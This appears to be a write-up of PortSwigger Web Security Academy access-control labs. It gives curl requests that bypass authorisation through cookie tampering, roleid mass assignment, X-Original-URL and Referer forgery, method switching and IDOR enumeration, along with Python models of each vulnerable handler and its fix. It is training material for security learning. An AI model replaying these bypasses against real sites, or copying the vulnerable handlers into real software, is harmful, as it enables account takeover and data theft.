Access Control - [PortSwigger]

Marmeus

    Unprotected admin functionality [Apprentice]

    robots.txt discloses a path that the site does not want indexed, which is exactly the kind of hint worth following.

    kali@kali:~$ curl https://<LAB_DOMAIN>.web-security-academy.net/robots.txt
    User-agent: *
    Disallow: /administrator-panel
    

    Simply browsing to /administrator-panel opens the administrator panel without any login, and from there the user carlos can be deleted.

    Unprotected admin functionality with unpredictable URL [Apprentice]

    Looking at the page's source code, there is an inline JavaScript snippet that contains the admin URL. The isAdmin flag only decides whether the link is rendered in the browser; the URL itself is sent to every visitor.

    kali@kali:~$ curl https://<LAB_DOMAIN>.web-security-academy.net/
    <script>
    var isAdmin = false;
    if (isAdmin) {
       var topLinksTag = document.getElementsByClassName("top-links")[0];
       var adminPanelTag = document.createElement('a');
       adminPanelTag.setAttribute('href', '/admin-28banw');
       adminPanelTag.innerText = 'Admin panel';
       topLinksTag.append(adminPanelTag);
       var pTag = document.createElement('p');
       pTag.innerText = '|';
       topLinksTag.appendChild(pTag);
    }
    </script>

    Browsing to /admin-28banw opens the admin panel, where the user carlos can be deleted. Hiding the path instead of checking the session is security through obscurity, not access control.

    User role controlled by request parameter [Apprentice]

    Log in as "wiener". The response sets a cookie named Admin with the value false in your browser. Edit that cookie (the Cookie Editor browser extension works well for this) and change its value to true; the server trusts this client-controlled value as the user's role.

    After that, you will be able to access the /admin page and delete carlos.

    User role can be modified in user profile [Apprentice]

    After logging in, it is possible to update wiener's email address. Looking at the response, a roleid attribute is returned alongside the fields that were submitted, which suggests the endpoint binds the whole JSON object to the account record.

    kali@kali:~$ curl -X POST -d '{"email":"a@b.c"}' -H "Content-Type: text/plain;charset=UTF-8" -b "session=<WIENER_COOKIE>" https://<LAB_DOMAIN>.web-security-academy.net/my-account/change-email
    {
      "username": "wiener",
      "email": "a@b.c",
      "apikey": "pdSKAyivDlf89oBOaC7FEo9elPLGsUrV",
      "roleid": 1
    }

    Add a roleid of 2 to the same request body; the server accepts the extra field (a mass assignment bug).

    kali@kali:~$ curl -X POST -d '{"email":"a@b.c","roleid":2}' -H "Content-Type: text/plain;charset=UTF-8" -b "session=<WIENER_COOKIE>" https://<LAB_DOMAIN>.web-security-academy.net/my-account/change-email
    {
      "username": "wiener",
      "email": "a@b.c",
      "apikey": "pdSKAyivDlf89oBOaC7FEo9elPLGsUrV",
      "roleid": 2
    }

    Then, you will be able to access the admin panel, deleting Carlos.
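    The mass-assignment bug behind this lab, modelled as an added example that is not the lab's code: a change-email handler that copies every JSON field onto the account record next to one that binds only an allowlisted field. User, change_email_vulnerable, change_email_fixed and demo are names assumed for illustration, and the account data is constructed.

```python
# Added example (not the lab's code): the mass-assignment bug behind the
# roleid lab, as a vulnerable change-email handler next to a hardened one.
# User, change_email_vulnerable, change_email_fixed and demo are names
# assumed for illustration; the data below is constructed.
import json
from dataclasses import dataclass, asdict

ROLE_USER = 1
ROLE_ADMIN = 2


@dataclass
class User:
    username: str
    email: str
    apikey: str
    roleid: int


def change_email_vulnerable(user: User, body: str) -> dict:
    """Copies every field of the JSON body onto the account record.

    The client is trusted to send only {"email": ...}, so a body that also
    carries "roleid": 2 silently promotes the caller to admin.
    """
    payload = json.loads(body)
    for key, value in payload.items():
        if hasattr(user, key):       # any known attribute is writable
            setattr(user, key, value)
    return asdict(user)


UPDATABLE_FIELDS = {"email"}  # allowlist: the only thing this endpoint may change


def change_email_fixed(user: User, body: str) -> dict:
    """Binds only the allowlisted field; anything else is an error, not a no-op."""
    payload = json.loads(body)
    unexpected = set(payload) - UPDATABLE_FIELDS
    if unexpected:
        raise ValueError(f"unexpected fields: {sorted(unexpected)}")
    email = payload.get("email")
    if not isinstance(email, str) or "@" not in email:
        raise ValueError("invalid email")
    user.email = email
    # roleid is never read from the request; it stays whatever the server holds.
    return asdict(user)


def demo() -> tuple:
    """Runs the same privilege-escalation body against both handlers and
    returns (roleid after vulnerable handler, roleid after fixed handler)."""
    attack = '{"email":"a@b.c","roleid":2}'  # constructed request body

    victim = User("wiener", "wiener@example.invalid", "constructed-apikey", ROLE_USER)
    change_email_vulnerable(victim, attack)

    hardened = User("wiener", "wiener@example.invalid", "constructed-apikey", ROLE_USER)
    try:
        change_email_fixed(hardened, attack)
    except ValueError:
        pass  # rejected, so the record is untouched
    return victim.roleid, hardened.roleid


if __name__ == "__main__":
    print(demo())
```

    Rejecting unexpected fields rather than silently ignoring them is deliberate: a noisy failure surfaces tampering in logs and tests, whereas a silent drop hides the probe.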

    URL-based access control can be circumvented [Practitioner]

    Requesting /admin directly as wiener is refused with a 403.

    kali@kali:~$ curl -D - https://<LAB_DOMAIN>.web-security-academy.net/admin/; echo
    HTTP/1.1 403 Forbidden
    Content-Type: application/json; charset=utf-8
    Connection: close
    Content-Length: 15
    
    "Access denied"

    The front-end enforces the restriction by looking only at the request's URL path, while the back-end honours the X-Original-URL header (mentioned in the exercise statement) as the path to actually serve. Sending a request for / with the header set to /admin/ passes the front-end check and still reaches the admin handler.

    kali@kali:~$ curl -D - -s -o /dev/null -H "X-Original-URL: /admin/" https://<LAB_DOMAIN>.web-security-academy.net/
    HTTP/1.1 200 OK
    Content-Type: text/html; charset=utf-8
    Cache-Control: no-cache
    Set-Cookie: session=<COOKIE>; Secure; HttpOnly; SameSite=None
    Connection: close
    Content-Length: 4760
    
    

    To delete the user carlos, the path override goes in the header while the query string stays on the real request URL, because the back-end reads parameters from the original request:

    kali@kali:~$ curl -D - -s -o /dev/null -H "X-Original-URL: /admin/delete/" https://<LAB_DOMAIN>.web-security-academy.net/?username=carlos
    HTTP/1.1 302 Found
    Location: /admin
    Set-Cookie: session=<COOKIE>; Secure; HttpOnly; SameSite=None
    Connection: close
    Content-Length: 0
    
    
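    Why the header works, as an added example that is not the lab's code: a front-end gate that authorises on the URL path in front of a back-end router that prefers X-Original-URL when present, and the fix of stripping override headers at the edge. The function names, the /admin routes and the OVERRIDE_HEADERS list are assumptions for illustration.

```python
# Added example (not the lab's code): a path-based front-end check in front of
# a back-end that honours X-Original-URL, showing why the header defeats the
# check and how stripping it at the edge closes the hole. Function names,
# the /admin routes and the override-header list are assumptions.
from urllib.parse import urlsplit, parse_qs

OVERRIDE_HEADERS = ("x-original-url", "x-rewrite-url")


def front_end_allows(path: str, role: str) -> bool:
    """Edge rule: only admins may request anything under /admin.
    It looks at the URL path and nothing else."""
    return not (path.startswith("/admin") and role != "admin")


def back_end_route(path: str, headers: dict, query: dict) -> str:
    """Application router: if an override header is present it is treated as
    the real path, which is the behaviour the lab relies on."""
    lower = {k.lower(): v for k, v in headers.items()}
    effective = path
    for name in OVERRIDE_HEADERS:
        if name in lower:
            effective = lower[name]
            break
    route = effective.rstrip("/")
    if route == "/admin":
        return "admin panel"
    if route == "/admin/delete":
        return "deleted " + query.get("username", [""])[0]
    return "public page"


def handle_vulnerable(url: str, headers: dict, role: str) -> tuple:
    """Edge check on the URL path, then the back-end routes on the header."""
    parts = urlsplit(url)
    if not front_end_allows(parts.path, role):
        return 403, "Access denied"
    return 200, back_end_route(parts.path, headers, parse_qs(parts.query))


def handle_fixed(url: str, headers: dict, role: str) -> tuple:
    """Fix: client-supplied override headers are dropped at the edge, so the
    path the front-end authorised is the one the back-end acts on."""
    clean = {k: v for k, v in headers.items() if k.lower() not in OVERRIDE_HEADERS}
    return handle_vulnerable(url, clean, role)


if __name__ == "__main__":
    print(handle_vulnerable("/admin/", {}, "user"))                         # (403, 'Access denied')
    print(handle_vulnerable("/?username=carlos",
                            {"X-Original-URL": "/admin/delete/"}, "user"))  # (200, 'deleted carlos')
    print(handle_fixed("/?username=carlos",
                       {"X-Original-URL": "/admin/delete/"}, "user"))       # (200, 'public page')
```

    The general rule the example illustrates: authorise the path the application will actually dispatch on, and never let an unauthenticated client set headers that a reverse proxy would normally set.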

    Method-based access control can be circumvented [Practitioner]

    The access control is only applied to POST requests to /admin-roles. Sending the same parameters in a GET request bypasses it, as shown here (the URL is quoted so the shell does not treat & as a background operator).

    kali@kali:~$ curl -D - -b "session=<WIENER_COOKIE>" "https://<LAB_DOMAIN>.web-security-academy.net/admin-roles?username=wiener&action=upgrade"
    HTTP/1.1 302 Found
    Location: /admin
    Connection: close
    Content-Length: 0
    
    

    User ID controlled by request parameter [Apprentice]

    Once logged in as wiener, changing the id parameter of /my-account to carlos is enough to retrieve his API key; the server uses the parameter rather than the session to decide whose account to show.

    kali@kali:~$ curl -sq -b "session=<WIENER_SESSION>" https://<LAB_DOMAIN>.web-security-academy.net/my-account?id=carlos | grep "Your API Key is"
                            <div>Your API Key is: XcCsjE3wsu61djaaTjOjSNkimQBhQXAB</div><br/>

    User ID controlled by request parameter, with unpredictable user IDs [Apprentice]

    Every blog post links to its author, and that link carries the author's GUID in the URL. Carlos has written a post, so his GUID is public; the attack is then the same as before, with the GUID as the id parameter instead of the username.

    User ID controlled by request parameter with data leakage in redirect [Apprentice]

    Doing the same thing as in the exercise "User ID controlled by request parameter" still works here.

    The server answers with a 302 and a Location: /login header, but the response body already contains carlos' account page. A browser follows the redirect and never shows that body; curl does not follow redirects unless told to, so the leaked page is printed as-is.

    kali@kali:~$ curl -sq -b "session=<WIENER_SESSION>" https://<LAB_DOMAIN>.web-security-academy.net/my-account?id=carlos | grep "Your API Key is"
                            <div>Your API Key is: Dd0ksWwhHm5xes139ItoAsqS6z62CFVA</div><br/>

    User ID controlled by request parameter with password disclosure [Apprentice]

    The same thing happens as in the previous exercise.

    If you log in as wiener and go to your account, the password field is shown as black dots, but in the source code the actual password is present in the input's value attribute.

    Because the server renders the page body and redirects in the same response, curl can be used to obtain the administrator's password.

    kali@kali:~$ curl -sq -b "session=<WIENER_COOKIE>" https://<LAB_DOMAIN>.web-security-academy.net/my-account?id=administrator | grep type=password
                                <input required type=password name=password value='19d7q21aperpm1vy3wm7'/>

    Insecure direct object references [Apprentice]

    On the web page there is a "Live chat" section, from which you can download a transcript. The first transcript is served as 2.txt, a sequential file name, so 1.txt very likely exists as well.

    By enumerating the transcript numbers you can obtain carlos' password from a transcript that was never yours.

    kali@kali:~$ curl -sq https://<LAB_DOMAIN>.web-security-academy.net/download-transcript/1.txt
    CONNECTED: -- Now chatting with Hal Pline --
    You: Hi Hal, I think I've forgotten my password and need confirmation that I've got the right one
    Hal Pline: Sure, no problem, you seem like a nice guy. Just tell me your password and I'll confirm whether it's correct or not.
    You: Wow you're so nice, thanks. I've heard from other people that you can be a right ****
    Hal Pline: Takes one to know one
    You: Ok so my password is rr0bazwc8gv1p5o2klcq. Is that right?
    Hal Pline: Yes it is!
    You: Ok thanks, bye!
    Hal Pline: Do one!
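    The two IDOR shapes from the labs above (a client-supplied user id on /my-account, including the body leaked behind a 302, and a guessable transcript number), as an added example that is not the lab's code, each beside a hardened handler. Account, ACCOUNTS, TRANSCRIPTS and every function name are assumptions, and the data is constructed, not the labs' real values.

```python
# Added example (not the lab's code): the two IDOR shapes from the labs
# above, a client-supplied user id on /my-account (including the leak of the
# body behind a 302) and a guessable transcript number, each beside a
# hardened handler. Account, ACCOUNTS, TRANSCRIPTS and all function names
# are assumptions; the data is constructed.
from dataclasses import dataclass


@dataclass
class Account:
    username: str
    apikey: str
    password: str


ACCOUNTS = {  # constructed sample users
    "wiener": Account("wiener", "WIENER-KEY-0001", "peter"),
    "carlos": Account("carlos", "CARLOS-KEY-0002", "montoya"),
}
TRANSCRIPTS = {  # transcript number -> (owner, text); constructed
    1: ("carlos", "You: Ok so my password is montoya. Is that right?\nHal Pline: Yes it is!"),
    2: ("wiener", "You: Hi\nHal Pline: Hello"),
}


def render_account(acct: Account) -> str:
    """The account page; the password is only masked by the input type."""
    return (f"<div>Your API Key is: {acct.apikey}</div>\n"
            f"<input required type=password name=password value='{acct.password}'/>")


def my_account_vulnerable(session_user: str, id_param: str) -> tuple:
    """Looks the account up by the ?id= parameter. A mismatch with the session
    triggers a redirect to /login, but the page has already been rendered into
    the body, so a client that does not follow the redirect still reads it."""
    acct = ACCOUNTS.get(id_param)
    if acct is None:
        return 404, {}, ""
    body = render_account(acct)
    if id_param != session_user:
        return 302, {"Location": "/login"}, body
    return 200, {}, body


def my_account_fixed(session_user: str, id_param: str = None) -> tuple:
    """Identity comes from the session only; id_param is ignored, and the
    redirect for an unauthenticated caller carries an empty body."""
    acct = ACCOUNTS.get(session_user)
    if acct is None:
        return 302, {"Location": "/login"}, ""
    return 200, {}, render_account(acct)


def download_transcript_vulnerable(session_user: str, number: int) -> tuple:
    """Serves any transcript whose number exists; ownership is never checked."""
    owner, text = TRANSCRIPTS.get(number, (None, None))
    return (200, text) if text is not None else (404, "")


def download_transcript_fixed(session_user: str, number: int) -> tuple:
    """Same 404 for 'missing' and 'not yours', so enumeration learns nothing."""
    owner, text = TRANSCRIPTS.get(number, (None, None))
    if text is None or owner != session_user:
        return 404, ""
    return 200, text


def leaked_apikey(body: str):
    """Pulls the key out of a page body the way the grep in the writeup does."""
    marker = "Your API Key is: "
    if marker not in body:
        return None
    start = body.index(marker) + len(marker)
    return body[start:body.index("<", start)]


def demo() -> tuple:
    """wiener asks for carlos: (status, key leaked by the vulnerable page,
    key from the fixed page, transcript 1 status before and after the fix)."""
    status, _headers, body = my_account_vulnerable("wiener", "carlos")
    _status_f, _, body_f = my_account_fixed("wiener", "carlos")
    return (status, leaked_apikey(body), leaked_apikey(body_f),
            download_transcript_vulnerable("wiener", 1)[0],
            download_transcript_fixed("wiener", 1)[0])


if __name__ == "__main__":
    print(demo())
```

    Two design points the hardened handlers make: the object to show is derived from the session, never from a request parameter, and a denial never carries the denied data in its body, whatever the status code says.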

    Multi-step process with no access control on one step [Practitioner]

    Logged in as administrator, intercept the requests made while upgrading a user.

    As you will see, the flow ends with a confirmation POST request; that is the request that actually upgrades or downgrades the user.

    POST /admin-roles HTTP/1.1
    Host: <LAB_DOMAIN>.web-security-academy.net
    Cookie: session=<COOKIE>
    User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 45
    Origin: https://<LAB_DOMAIN>.web-security-academy.net
    Referer: https://<LAB_DOMAIN>.web-security-academy.net/admin-roles
    Connection: close
    
    action=upgrade&confirmed=true&username=carlos
    

    Sending the same request as wiener (only the session cookie changes), with your own username in the body, makes you admin: the first step of the flow is access-controlled, but the confirmation step is not.

    kali@kali:~$ curl -D - -sqX POST https://<LAB_DOMAIN>.web-security-academy.net/admin-roles -b "session=<WIENER_COOKIE>" -H "Content-Type: application/x-www-form-urlencoded" -d "action=upgrade&confirmed=true&username=wiener"
    HTTP/1.1 302 Found
    Location: /admin
    Connection: close
    Content-Length: 0

    Referer-based access control [Practitioner]

    Logged in as administrator, if you try to upgrade a user with a Referer header that does not contain /admin, you get a "401 Unauthorized": the Referer is the only thing being checked.

    Since the Referer is fully client-controlled, wiener can send the same request with a forged Referer pointing at /admin and upgrade any account.

    kali@kali:~$ curl -sqD - "https://<LAB_DOMAIN>.web-security-academy.net/admin-roles?username=wiener&action=upgrade" -b "session=<WIENER_COOKIE>" -H "Referer: https://<LAB_DOMAIN>.web-security-academy.net/admin"
    HTTP/1.1 302 Found
    Location: /admin
    Connection: close
    Content-Length: 0
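    The three admin-roles bugs above (the check applied only to POST, only to the first step of the two-step flow, and only to the Referer header), as an added example that is not the lab's code: each modelled as a handler over a constructed Request, next to a single handler that authorises on the session role before anything else. ROLES, Request and every function name are assumptions for illustration.

```python
# Added example (not the lab's code): the three admin-roles bugs above, the
# check applied only to POST, only to the first step of the two-step flow,
# and only to the Referer header, each as a handler on a constructed Request,
# next to one handler that authorises on the session role alone. Every
# name here is an assumption for illustration.
from dataclasses import dataclass, field

ROLES = {"administrator": "admin", "wiener": "user", "carlos": "user"}  # constructed


@dataclass
class Request:
    method: str
    params: dict
    headers: dict = field(default_factory=dict)
    session_user: str = "wiener"  # who the session cookie belongs to

    @property
    def session_role(self) -> str:
        return ROLES.get(self.session_user, "anonymous")


def _apply(params: dict) -> tuple:
    """The privileged action itself: change a user's role, then redirect."""
    user, action = params.get("username"), params.get("action")
    if action == "upgrade":
        ROLES[user] = "admin"
    elif action == "downgrade":
        ROLES[user] = "user"
    return 302, "/admin"


def admin_roles_method_based(req: Request) -> tuple:
    """Only POST is guarded; a GET with the same parameters walks straight in."""
    if req.method == "POST" and req.session_role != "admin":
        return 401, "Unauthorized"
    return _apply(req.params)


def admin_roles_multistep(req: Request) -> tuple:
    """Step 1 (no confirmed flag) is guarded; step 2 (confirmed=true) is not."""
    if req.params.get("confirmed") != "true":
        if req.session_role != "admin":
            return 401, "Unauthorized"
        return 200, "confirm?"
    return _apply(req.params)


def admin_roles_referer_based(req: Request) -> tuple:
    """Treats 'came from /admin' in the Referer as proof of being an admin."""
    if "/admin" not in req.headers.get("Referer", ""):
        return 401, "Unauthorized"
    return _apply(req.params)


def admin_roles_fixed(req: Request) -> tuple:
    """One rule, evaluated first on every request: the session must be an
    admin. Method and step are checked after that, and headers are ignored."""
    if req.session_role != "admin":
        return 401, "Unauthorized"
    if req.method != "POST":
        return 405, "Method Not Allowed"
    if req.params.get("confirmed") != "true":
        return 200, "confirm?"
    return _apply(req.params)


def run_bypasses() -> dict:
    """Runs wiener's three bypass requests against the handler each targets
    and against the fixed handler; returns (status, wiener's resulting role)."""
    base = {"username": "wiener", "action": "upgrade"}
    attempts = {
        "method": (admin_roles_method_based, Request("GET", dict(base))),
        "multistep": (admin_roles_multistep, Request("POST", {**base, "confirmed": "true"})),
        "referer": (admin_roles_referer_based,
                    Request("GET", dict(base), {"Referer": "https://lab.example/admin"})),
    }
    out = {}
    for name, (handler, req) in attempts.items():
        ROLES["wiener"] = "user"
        status, _ = handler(req)
        out[name] = (status, ROLES["wiener"])
        ROLES["wiener"] = "user"
        status, _ = admin_roles_fixed(req)
        out["fixed_" + name] = (status, ROLES["wiener"])
    return out


if __name__ == "__main__":
    for name, result in run_bypasses().items():
        print(name, result)
```

    The common thread is the order of checks: the authorisation decision must depend on who the session belongs to and must run before any branch on method, step or header, because every one of those other signals is chosen by the client.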